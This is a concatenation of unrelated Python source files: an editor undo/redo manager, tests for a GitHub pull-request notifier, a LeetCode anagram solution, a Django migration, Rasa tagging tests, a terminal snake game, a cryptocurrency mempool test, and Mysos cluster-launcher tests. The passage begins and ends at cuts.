pass
def addUndoObserver(self, observer):
"""observer is a callable to be invoked when an undo operation
is selected"""
self.undoObservers.append(observer)
def addRedoObserver(self, observer):
"""observer is a callable to be invoked when an redo operation
is selected"""
self.redoObservers.append(observer)
def removeUndoObserver(self, observer):
"""observer is a callable to be removed from the list"""
self.undoObservers.remove(observer)
def removeRedoObserver(self, observer):
"""observer is a callable to be removed from the list"""
self.redoObservers.remove(observer)
def undoEnabled(self):
"""for managing undo/redo button state"""
return self.enabled and self.undoList != []
def redoEnabled(self):
"""for managing undo/redo button state"""
return self.enabled and self.redoList != []
def storeVolume(self,checkPointList,volumeNode):
""" Internal helper function
Save a stashed copy of the given volume node into
the passed list (could be undo or redo list)
"""
if not self.enabled or not volumeNode or not volumeNode.GetImageData():
return
checkPointList.append( self.checkPoint(volumeNode) )
self.stateChangedCallback()
if len(checkPointList) >= self.undoSize:
return( checkPointList[1:] )
else:
return( checkPointList )
def saveState(self):
"""Called by effects as they modify the label volume node
"""
# store current state onto undoList
self.undoList = self.storeVolume( self.undoList, EditUtil.getLabelVolume() )
self.redoList = []
self.stateChangedCallback()
def undo(self):
"""Perform the operation when the user presses
the undo button on the editor interface.
This pushes the current state onto the redoList and
removes a volume from the undoList.
"""
if self.undoList == []:
return
# store current state onto redoList
self.redoList = self.storeVolume( self.redoList, EditUtil.getLabelVolume() )
# get the checkPoint to restore and remove it from the list
self.undoList[-1].restore()
self.undoList = self.undoList[:-1]
self.stateChangedCallback()
for observer in self.undoObservers:
observer()
def redo(self):
"""Perform the operation when the user presses
the undo button on the editor interface.
This pushes the current state onto the undo stack
and restores the state from the redo stack
"""
if self.redoList == []:
return
# store current state onto undoList
self.undoList = self.storeVolume( self.undoList, EditUtil.getLabelVolume() )
# get the checkPoint to restore and remove it from the list
self.redoList[-1].restore()
self.redoList = self.redoList[:-1]
self.stateChangedCallback()
for observer in self.redoObservers:
observer()
|
py | b40b1c6b53959df4ac8f8a7e4138a8198927a5a5 | import mock
import pytest
import requests
from pullbug.github_bug import GithubBug
@pytest.fixture
def _mock_github_token():
return '123'
@pytest.fixture
def _mock_user():
return 'mock-user'
@pytest.fixture
def _mock_github_context():
return 'users'
@pytest.fixture
def _mock_github_state():
return 'open'
@pytest.fixture
def _mock_repo():
mock_repo = {
'name': 'mock-repo'
}
return mock_repo
@pytest.fixture
def _mock_pull_request(_mock_user, _mock_repo):
mock_pull_request = {
'title': 'mock-pull-request',
'description': 'Mock description',
'assignees': [
{
'login': _mock_user,
'html_url': f'https://github.com/{_mock_user}'
},
],
'body': 'Mock body of a pull request.',
'html_url': f'https://github.com/{_mock_user}/{_mock_repo}/pull/1'
}
return mock_pull_request
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_success(mock_logger, mock_get_repos, mock_pull_request):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, False)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.github_bug.GithubBug.iterate_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests', return_value=[])
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_no_pull_requests(mock_logger, mock_get_repos, mock_pull_request, mock_iterate_pull_requests):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, False)
mock_get_repos.assert_called_once()
mock_iterate_pull_requests.assert_not_called()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.messages.Messages.slack')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_with_slack(mock_logger, mock_get_repos, mock_pull_request, mock_slack):
GithubBug.run('mock-owner', 'open', 'orgs', False, True, False)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_slack.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.cli.GITHUB_TOKEN', '123')
@mock.patch('pullbug.messages.Messages.rocketchat')
@mock.patch('pullbug.github_bug.GithubBug.get_pull_requests')
@mock.patch('pullbug.github_bug.GithubBug.get_repos')
@mock.patch('pullbug.github_bug.LOGGER')
def test_run_with_rocketchat(mock_logger, mock_get_repos, mock_pull_request, mock_rocketchat):
GithubBug.run('mock-owner', 'open', 'orgs', False, False, True)
mock_get_repos.assert_called_once()
mock_pull_request.assert_called_once()
mock_rocketchat.assert_called_once()
mock_logger.info.assert_called()
@mock.patch('pullbug.github_bug.GITHUB_TOKEN', _mock_github_token)
@mock.patch('pullbug.github_bug.GITHUB_HEADERS')
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get')
def test_get_repos_success(mock_request, mock_logger, mock_headers, _mock_user, _mock_github_context):
# TODO: Mock this request better and assert additional values
GithubBug.get_repos(_mock_user, _mock_github_context)
mock_request.assert_called_once_with(
f'https://api.github.com/{_mock_github_context}/{_mock_user}/repos?per_page=100',
headers=mock_headers
)
assert mock_logger.info.call_count == 2
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=requests.exceptions.RequestException('mock-error'))
def test_get_repos_exception(mock_request, mock_logger, _mock_user, _mock_github_context):
with pytest.raises(requests.exceptions.RequestException):
GithubBug.get_repos(_mock_user, _mock_github_context)
mock_logger.error.assert_called_once_with(
'Could not retrieve GitHub repos: mock-error'
)
@mock.patch('pullbug.github_bug.GITHUB_TOKEN', _mock_github_token)
@mock.patch('pullbug.github_bug.GITHUB_HEADERS')
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get')
def test_get_pull_requests_success(mock_request, mock_logger, mock_headers, _mock_repo, _mock_github_state):
# TODO: Mock this request better and assert additional values
mock_repos = [_mock_repo]
result = GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_request.assert_called_once_with(
f'https://api.github.com/repos/{_mock_user}/{_mock_repo["name"]}/pulls?state={_mock_github_state}&per_page=100',
headers=mock_headers
)
assert mock_logger.info.call_count == 2
assert isinstance(result, list)
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=requests.exceptions.RequestException('mock-error'))
def test_get_pull_requests_request_exception(mock_request, mock_logger, _mock_repo):
mock_repos = [_mock_repo]
with pytest.raises(requests.exceptions.RequestException):
GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_logger.error.assert_called_once_with(
f'Could not retrieve GitHub pull requests for {_mock_repo["name"]}: mock-error'
)
@mock.patch('pullbug.github_bug.LOGGER')
@mock.patch('requests.get', side_effect=TypeError('mock-error'))
def test_get_pull_requests_type_error_exception(mock_request, mock_logger, _mock_repo):
mock_repos = [_mock_repo]
with pytest.raises(TypeError):
GithubBug.get_pull_requests(mock_repos, _mock_user, _mock_github_state)
mock_logger.error.assert_called_once_with(
f'Could not retrieve GitHub pull requests due to bad parameter: {_mock_user} | {_mock_github_state}.'
)
@mock.patch('pullbug.github_bug.GithubBug.prepare_message')
def test_iterate_pull_requests_wip_title(mock_prepare_message, _mock_pull_request):
_mock_pull_request['title'] = 'wip: mock-pull-request'
mock_pull_requests = [_mock_pull_request]
GithubBug.iterate_pull_requests(mock_pull_requests, True)
mock_prepare_message.assert_called_once()
@mock.patch('pullbug.github_bug.GithubBug.prepare_message')
def test_iterate_pull_requests_wip_setting_absent(mock_prepare_message, _mock_pull_request):
_mock_pull_request['title'] = 'wip: mock-pull-request'
mock_pull_requests = [_mock_pull_request]
GithubBug.iterate_pull_requests(mock_pull_requests, False)
mock_prepare_message.assert_not_called()
def test_prepare_message(_mock_pull_request, _mock_user, _mock_repo):
result = GithubBug.prepare_message(_mock_pull_request)
assert 'Pull Request' in result
assert f'{_mock_pull_request["assignees"][0]["html_url"]}|{_mock_pull_request["assignees"][0]["login"]}' in result
assert f'{_mock_pull_request["html_url"]}|{_mock_pull_request["title"]}' in result
def test_prepare_message_no_assignees_data(_mock_pull_request):
_mock_pull_request['assignees'][0]['login'] = None
result = GithubBug.prepare_message(_mock_pull_request)
assert '*Waiting on:* No assignee' in result
def test_prepare_message_no_assignee(_mock_pull_request):
_mock_pull_request['assignees'] = []
result = GithubBug.prepare_message(_mock_pull_request)
assert '*Waiting on:* No assignee' in result
|
py | b40b1d7cfce09d0dcb8983fe777d518aea421b6a | '''
From: LeetCode - 438. Find All Anagrams in a String
Level: Easy
Source: https://leetcode.com/problems/find-all-anagrams-in-a-string/description/
Status: TLE
Solution: Using Brute Force
'''
class Solution(object):
def findAnagrams(self, s, p):
"""
:type s: str
:type p: str
:rtype: List[int]
"""
if not s or not p:
return []
dicts = {c: p.count(c) for c in p}
end = len(s) - len(p) + 1
result = []
i = 0
while i < end:
dic = dicts.copy()
for j in range(i, i+len(p)):
if s[j] not in dic.keys():
dic[s[j]] = -1
i = j
break
elif dic[s[j]] == 0:
dic[s[j]] = -1
break
else:
dic[s[j]] -= 1
# print(dic)
if -1 not in dic.values():
result.append(i)
i += 1
return result
# times o(n^2)
# space o(n)
'''
Most Optimal Answer: Sliding window
class Solution(object):
def findAnagrams(self, s, p):
"""
:type s: str
:type p: str
:rtype: List[int]
"""
result = []
if len(p) > len(s):
return result
begin, end, length = 0, 0, len(s)
dic = {c: p.count(c) for c in p}
count = len(dic.keys())
while end < length:
c = s[end]
if c in dic.keys():
dic[c] -= 1
if dic[c] == 0:
count -= 1
end += 1
while count == 0:
ch = s[begin]
if ch in dic:
dic[ch] += 1
if dic[ch] > 0:
count += 1
if end - begin == len(p):
result.append(begin)
begin += 1
return result
# times o(n)
# space o(n)
''' |
py | b40b1d979380c2bfaaaa0292acc222c650bbfc12 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Source'
db.create_table(u'thumbnails_source', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal(u'thumbnails', ['Source'])
# Adding model 'ThumbnailMeta'
db.create_table(u'thumbnails_thumbnailmeta', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('source', self.gf('django.db.models.fields.related.ForeignKey')(related_name='thumbnails', to=orm['thumbnails.Source'])),
('size', self.gf('django.db.models.fields.CharField')(max_length=64)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal(u'thumbnails', ['ThumbnailMeta'])
# Adding unique constraint on 'ThumbnailMeta', fields ['source', 'size']
db.create_unique(u'thumbnails_thumbnailmeta', ['source_id', 'size'])
def backwards(self, orm):
# Removing unique constraint on 'ThumbnailMeta', fields ['source', 'size']
db.delete_unique(u'thumbnails_thumbnailmeta', ['source_id', 'size'])
# Deleting model 'Source'
db.delete_table(u'thumbnails_source')
# Deleting model 'ThumbnailMeta'
db.delete_table(u'thumbnails_thumbnailmeta')
models = {
u'thumbnails.source': {
'Meta': {'object_name': 'Source'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'thumbnails.thumbnailmeta': {
'Meta': {'unique_together': "(('source', 'size'),)", 'object_name': 'ThumbnailMeta'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'thumbnails'", 'to': u"orm['thumbnails.Source']"})
}
}
complete_apps = ['thumbnails'] |
py | b40b1ec3021977c51c067d40ef4eecd04f1c3331 | import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
import aws_cdk.aws_autoscaling_common._jsii
import aws_cdk.aws_cloudwatch._jsii
import aws_cdk.aws_ec2._jsii
import aws_cdk.aws_elasticloadbalancing._jsii
import aws_cdk.aws_elasticloadbalancingv2._jsii
import aws_cdk.aws_iam._jsii
import aws_cdk.aws_sns._jsii
import aws_cdk.core._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"@aws-cdk/aws-autoscaling",
"1.118.0",
__name__[0:-6],
"[email protected]",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
py | b40b201b2db21c47ade854172efe79f336a980da | import logging
from typing import Text, List, Optional
from _pytest.logging import LogCaptureFixture
import pytest
from rasa.nlu.tokenizers.whitespace_tokenizer import WhitespaceTokenizer
import rasa.nlu.utils.bilou_utils as bilou_utils
from rasa.nlu.constants import BILOU_ENTITIES
from rasa.shared.nlu.constants import ENTITIES
from rasa.shared.nlu.training_data.training_data import TrainingData
from rasa.shared.nlu.training_data.message import Message
@pytest.mark.parametrize(
"tag, expected",
[
("B-person", "person"),
("I-location", "location"),
("location", "location"),
("U-company", "company"),
("L-company", "company"),
],
)
def test_entity_name_from_tag(tag, expected):
actual = bilou_utils.tag_without_prefix(tag)
assert actual == expected
@pytest.mark.parametrize(
"tag, expected",
[
("B-person", "B-"),
("I-location", "I-"),
("location", None),
("U-company", "U-"),
("L-company", "L-"),
("O-company", None),
],
)
def test_bilou_from_tag(tag, expected):
actual = bilou_utils.bilou_prefix_from_tag(tag)
assert actual == expected
def test_tags_to_ids():
message = Message.build(text="Germany is part of the European Union")
message.set(
BILOU_ENTITIES,
["U-location", "O", "O", "O", "O", "B-organisation", "L-organisation"],
)
tag_id_dict = {"O": 0, "U-location": 1, "B-organisation": 2, "L-organisation": 3}
tags = bilou_utils.bilou_tags_to_ids(message, tag_id_dict)
assert tags == [1, 0, 0, 0, 0, 2, 3]
def test_build_tag_id_dict():
message_1 = Message.build(
text="Germany is part of the European Union", intent="inform"
)
message_1.set(
BILOU_ENTITIES,
["U-location", "O", "O", "O", "O", "B-organisation", "L-organisation"],
)
message_2 = Message.build(text="Berlin is the capital of Germany", intent="inform")
message_2.set(BILOU_ENTITIES, ["U-location", "O", "O", "O", "O", "U-location"])
training_data = TrainingData([message_1, message_2])
tag_id_dict = bilou_utils.build_tag_id_dict(training_data)
assert tag_id_dict == {
"O": 0,
"B-location": 1,
"I-location": 2,
"L-location": 3,
"U-location": 4,
"B-organisation": 5,
"I-organisation": 6,
"L-organisation": 7,
"U-organisation": 8,
}
def test_apply_bilou_schema(whitespace_tokenizer: WhitespaceTokenizer):
message_1 = Message.build(
text="Germany is part of the European Union", intent="inform"
)
message_1.set(
ENTITIES,
[
{"start": 0, "end": 7, "value": "Germany", "entity": "location"},
{
"start": 23,
"end": 37,
"value": "European Union",
"entity": "organisation",
},
],
)
message_2 = Message.build(text="Berlin is the capital of Germany", intent="inform")
message_2.set(
ENTITIES,
[
{"start": 0, "end": 6, "value": "Berlin", "entity": "location"},
{"start": 25, "end": 32, "value": "Germany", "entity": "location"},
],
)
training_data = TrainingData([message_1, message_2])
whitespace_tokenizer.process_training_data(training_data)
bilou_utils.apply_bilou_schema(training_data)
assert message_1.get(BILOU_ENTITIES) == [
"U-location",
"O",
"O",
"O",
"O",
"B-organisation",
"L-organisation",
]
assert message_2.get(BILOU_ENTITIES) == [
"U-location",
"O",
"O",
"O",
"O",
"U-location",
]
@pytest.mark.parametrize(
"tags, confidences, expected_tags, expected_confidences, debug_message",
[
(
["O", "B-person", "I-person", "L-person", "O", "U-person", "O"],
[0.99, 0.89, 0.93, 0.99, 0.89, 0.97, 0.87],
["O", "B-person", "I-person", "L-person", "O", "U-person", "O"],
[0.99, 0.89, 0.93, 0.99, 0.89, 0.97, 0.87],
None,
),
(
["O", "B-person", "B-location", "I-location", "O"],
[0.99, 0.89, 0.93, 0.78, 0.89],
["O", "U-person", "B-location", "L-location", "O"],
[0.99, 0.89, 0.93, 0.78, 0.89],
"B- tag not closed",
),
(
["O", "B-person", "I-location", "L-person"],
[0.99, 0.89, 0.77, 0.87],
["O", "B-person", "I-person", "L-person"],
[0.99, 0.89, 0.76, 0.87],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location"],
[0.99, 0.78, 0.93, 0.96],
["O", "B-location", "I-location", "L-location"],
[0.99, 0.79, 0.93, 0.96],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location"],
[0.99, 0.99, 0.77, 0.77],
["O", "B-location", "I-location", "L-location"],
[0.99, 0.72, 0.77, 0.77],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "I-location", "L-location", "B-person", "L-person"],
[0.99, 0.78, 0.93, 0.96, 0.93, 0.96],
["O", "B-location", "I-location", "L-location", "B-person", "L-person"],
[0.99, 0.79, 0.93, 0.96, 0.93, 0.96],
"B- tag, L- tag pair encloses multiple entity classes",
),
(
["O", "B-person", "O"],
[0.99, 0.89, 0.87],
["O", "U-person", "O"],
[0.99, 0.89, 0.87],
"B- tag not closed",
),
(
["O", "B-person"],
[0.99, 0.89],
["O", "U-person"],
[0.99, 0.89],
"B- tag not closed",
),
(
["O", "B-person", "I-person"],
[0.99, 0.89, 0.87],
["O", "B-person", "L-person"],
[0.99, 0.89, 0.87],
"B- tag not closed",
),
(
["O", "B-person", "I-location"],
[0.99, 0.89, 0.78],
["O", "B-person", "L-person"],
[0.99, 0.89, 0.64],
"B- tag not closed",
),
(
["O", "B-person", "B-location"],
[0.99, 0.89, 0.89],
["O", "U-person", "U-location"],
[0.99, 0.89, 0.89],
"B- tag not closed",
),
],
)
def test_check_consistent_bilou_tagging(
tags: List[Text],
confidences: List[float],
expected_tags: List[Text],
expected_confidences: List[float],
debug_message: Optional[Text],
caplog: LogCaptureFixture,
):
with caplog.at_level(logging.DEBUG):
actual_tags, actual_confidences = bilou_utils.ensure_consistent_bilou_tagging(
tags, confidences
)
if debug_message:
assert len(caplog.records) > 0
assert debug_message in caplog.text
else:
assert len(caplog.records) == 0
assert actual_tags == expected_tags
assert actual_confidences == expected_confidences
|
py | b40b2139d6cd7e219dfc3525517994463ac91e58 | import subprocess
import sys
import random
from enum import Enum
from getkey import getkey, keys
class Direction(Enum):
UP = (-1, 0)
DOWN = (1, 0)
RIGHT = (0, 1)
LEFT = (0, -1)
def __init__(self, x, y):
self.x = x
self.y = y
def __getitem__(self, index):
return self.value[index]
def is_opposite_of(self, other):
return self.x == (-1 * other.x) and self.y == (-1 * other.y)
def clear_screen():
subprocess.call('clear',shell=True)
def read_key(valid_keys = [keys.UP, keys.LEFT, keys.RIGHT, keys.DOWN]):
key = getkey()
while key not in valid_keys:
key = getkey()
return key
class Snake:
def __init__(self, initial_body):
self.body = initial_body
@property
def head(self):
return self.body[-1]
def move(self, direction):
self.grow(direction)
self.body = self.body[1:]
def grow(self, direction):
new_head = [self.head[0] + direction[0], self.head[1] + direction[1]]
self.body.append(new_head)
class Game:
SNAKE_BODY_PART = "*"
SNAKE_HEAD = "@"
FOOD = "+"
EMPTY_SPACE = " "
def __init__(self, size, snake, initial_direction):
self.size = size
self.snake = snake
self.snake_direction = initial_direction
self.food = self.__new_food()
self.board = []
for i in range(size):
columns = []
for i in range(size):
columns.append(Game.EMPTY_SPACE)
self.board.append(columns)
def play(self):
while True:
clear_screen()
self.__render_board()
key_press = read_key()
next_direction = self.__get_move_direction(key_press)
if next_direction.is_opposite_of(self.snake_direction):
continue
self.snake_direction = next_direction
self.snake.move(next_direction)
if self.food == self.snake.head:
self.snake.grow(next_direction)
self.food = self.__new_food()
if self.__is_outside_of_board():
break
print("Game over!")
def __render_board(self):
for i in range(self.size):
for j in range(self.size):
symbol = self.board[i][j]
if self.__is_snake_body_part([i, j]):
symbol = Game.SNAKE_BODY_PART
elif self.__is_snake_head([i, j]):
symbol = Game.SNAKE_HEAD
elif self.__is_food([i, j]):
symbol = Game.FOOD
print("[{}]".format(symbol), end='')
print()
print()
def __get_move_direction(self, key_press):
if key_press == keys.UP:
return Direction.UP
elif key_press == keys.DOWN:
return Direction.DOWN
elif key_press == keys.LEFT:
return Direction.LEFT
elif key_press == keys.RIGHT:
return Direction.RIGHT
def __new_food(self):
cells = []
for i in range(self.size):
for j in range(self.size):
if [i, j] not in self.snake.body:
cells.append([i, j])
return random.choice(cells)
def __is_outside_of_board(self):
head = self.snake.head
return (head[0] < 0 or head[0] > self.size - 1) or \
(head[1] < 0 or head[1] > self.size - 1)
def __is_snake_body_part(self, pos):
return pos in self.snake.body and not self.__is_snake_head(pos)
def __is_snake_head(self, pos):
return pos == self.snake.head
def __is_food(self, pos):
return pos == self.food
if __name__ == "__main__":
snake = Snake([[5, 4], [4, 4], [3, 4]])
game = Game(10, snake, Direction.UP)
game.play()
|
py | b40b21c6842eb9d912242c2a3437bd2cc8e7e667 | from ReHistoGAN.rehistoGAN import recoloringTrainer
|
py | b40b23ab4d69cdfef0c0e301c6172dd56cd8d54a | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import VEKTORCOINTestFramework
from test_framework.util import assert_equal
class MempoolCoinbaseTest(VEKTORCOINTestFramework):
def set_test_params(self):
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [self.nodes[0].getblockhash(n) for n in range(1, 4)]
coinbase_txids = [self.nodes[0].getblock(h)['tx'][0] for h in b]
spends1_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.99) for txid in coinbase_txids]
spends1_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [create_raw_transaction(self.nodes[0], txid, node0_address, amount=49.98) for txid in spends1_id]
spends2_id = [self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back
for node in self.nodes:
node.invalidateblock(blocks[0])
# All txns should be back in mempool with 0 confirmations
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
py | b40b23db4197dc1ef2c868c52babb9a3b3fef6d2 | import json
import os
import shutil
import tempfile
import threading
from mysos.common.cluster import get_cluster_path, wait_for_master
from mysos.common.testing import Fake
from mysos.scheduler.launcher import create_resources, MySQLClusterLauncher
from mysos.scheduler.password import gen_encryption_key, PasswordBox
from mysos.scheduler.scheduler import DEFAULT_TASK_CPUS, DEFAULT_TASK_MEM, DEFAULT_TASK_DISK
from mysos.scheduler.state import LocalStateProvider, MySQLCluster
from mysos.scheduler.zk_state import ZooKeeperStateProvider
from kazoo.handlers.threading import SequentialThreadingHandler
import mesos.interface.mesos_pb2 as mesos_pb2
from twitter.common import log
from twitter.common.concurrent import deadline
from twitter.common.quantity import Amount, Data, Time
from zake.fake_client import FakeClient
from zake.fake_storage import FakeStorage
import pytest
if 'MYSOS_DEBUG' in os.environ:
from twitter.common.log.options import LogOptions
LogOptions.set_stderr_log_level('google:DEBUG')
LogOptions.set_simple(True)
log.init('mysos_tests')
class FakeDriver(Fake): pass
class TestLauncher(object):
@pytest.fixture(params=[LocalStateProvider, ZooKeeperStateProvider], autouse=True)
def setup(self, request):
self._driver = FakeDriver()
self._storage = FakeStorage(SequentialThreadingHandler())
self._zk_client = FakeClient(storage=self._storage)
self._zk_client.start()
self._offer = mesos_pb2.Offer()
self._offer.id.value = "offer_id_0"
self._offer.framework_id.value = "framework_id_0"
self._offer.slave_id.value = "slave_id_0"
self._offer.hostname = "localhost"
# Enough resources to fit three tasks.
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
disk=DEFAULT_TASK_DISK * 3,
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
self._framework_user = "framework_user"
# Some tests use the default launcher; some don't.
self._zk_url = "zk://host/mysos/test"
self._scheduler_key = gen_encryption_key()
self._password_box = PasswordBox(self._scheduler_key)
self._cluster = MySQLCluster(
"cluster0",
"user",
self._password_box.encrypt("pass"),
3,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK)
# Construct the state provider based on the test parameter.
if request.param == LocalStateProvider:
tmpdir = tempfile.mkdtemp()
self._state_provider = LocalStateProvider(tmpdir)
request.addfinalizer(lambda: shutil.rmtree(tmpdir, True)) # Clean up after ourselves.
elif request.param == ZooKeeperStateProvider:
self._state_provider = ZooKeeperStateProvider(self._zk_client, "/mysos/test")
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS)) # Short interval.
self._elected = threading.Event()
self._launchers = [self._launcher] # See teardown().
request.addfinalizer(self.teardown)
def teardown(self):
for launcher in self._launchers:
if launcher._elector:
launcher._elector.abort() # Abort the thread even if the election is pending.
launcher._elector.join()
def test_launch_cluster_all_nodes_successful(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
def test_launch_cluster_insufficient_resources(self):
"""All but one slave in the slave are launched successfully."""
del self._offer.resources[:]
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
disk=DEFAULT_TASK_DISK * 3 - Amount(1, Data.MB), # 1mb less than required disk space.
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
# There is one fewer port than required to launch the entire cluster.
for i in range(self._cluster.num_nodes - 1):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes - 1
# The final task cannot get launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes - 1
# The two nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes - 1):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# One slave.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 1
def test_two_launchers(self):
"""Two launchers share resources and launch their clusters successfully."""
launchers = [
MySQLClusterLauncher(
self._driver,
MySQLCluster(
"cluster0",
"user0",
self._password_box.encrypt("pass0"),
1,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK),
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key),
MySQLClusterLauncher(
self._driver,
MySQLCluster(
"cluster1",
"user1",
self._password_box.encrypt("pass1"),
2,
DEFAULT_TASK_CPUS,
DEFAULT_TASK_MEM,
DEFAULT_TASK_DISK),
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)]
